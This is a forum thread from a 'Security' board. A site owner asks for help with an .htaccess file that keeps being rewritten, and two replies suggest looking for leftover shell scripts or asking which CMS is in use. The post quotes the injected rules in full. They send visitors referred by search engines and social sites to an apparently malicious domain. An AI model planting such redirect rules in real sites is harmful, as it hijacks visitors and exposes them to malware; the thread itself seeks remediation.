htaccess file is redirecting my site

Discussion in 'Security' started by folkdances, Jun 13, 2011.

0
  1. #1
    PLEASE HELP ME,
    some code is added in to htaccess file and my site is redirecting another site. I deleted and re-create and re-sent htaccess file , but when I send htaccess on my public_html folder a new malicious code is automatically added on to the file. Please help.
    codes are the following:
    RewriteEngine On
    ErrorDocument 400 seishell-inoa-ru/wings/index-php
    ErrorDocument 401 seishell-inoa-ru/wings/index-php
    ErrorDocument 403 seishell-inoa-ru/wings/index-php
    ErrorDocument 404 seishell-inoa-ru/wings/index-php
    ErrorDocument 500 seishell-inoa-ru/wings/index-php
    RewriteCond %{HTTP_REFERER} .*google.* [OR]
    RewriteCond %{HTTP_REFERER} .*ask.* [OR]
    RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
    RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
    RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
    RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
    RewriteCond %{HTTP_REFERER} .*qq.* [OR]
    RewriteCond %{HTTP_REFERER} .*excite.* [OR]
    RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
    RewriteCond %{HTTP_REFERER} .*msn.* [OR]
    RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
    RewriteCond %{HTTP_REFERER} .*aol.* [OR]
    RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
    RewriteCond %{HTTP_REFERER} .*goto.* [OR]
    RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
    RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
    RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
    RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
    RewriteCond %{HTTP_REFERER} .*search.* [OR]
    RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
    RewriteCond %{HTTP_REFERER} .*bing.* [OR]
    RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
    RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
    RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
    RewriteCond %{HTTP_REFERER} .*blog.* [OR]
    RewriteCond %{HTTP_REFERER} .*live.* [OR]
    RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
    RewriteCond %{HTTP_REFERER} .*mail.* [OR]
    RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
    RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
    RewriteCond %{HTTP_REFERER} .*ya.* [OR]
    RewriteCond %{HTTP_REFERER} .*aport.* [OR]
    RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
    RewriteCond %{HTTP_REFERER} .*flickr.*
    RewriteRule ^(.*)$ seishell-inoa-ru/wings/index-php [R=301,L]
     
    Last edited: Jun 13, 2011
    folkdances, Jun 13, 2011 IP
  2. stardust.x7

    stardust.x7 Active Member

    Messages:
    369
    Likes Received:
    3
    Best Answers:
    1
    Trophy Points:
    90
    #2
    Is there any shell hacking scripts left on your root dir or, into any CHMOD 777 based dir by hackers through sql injection? Have a check on this. Its not having any connection with .htaccess for sure.
     
    stardust.x7, Jun 13, 2011 IP
  3. phpSiteMinder

    phpSiteMinder Peon

    Messages:
    47
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #3
    Is your site running on a CMS (wordpress, joomla, etc)?
     
    phpSiteMinder, Jun 17, 2011 IP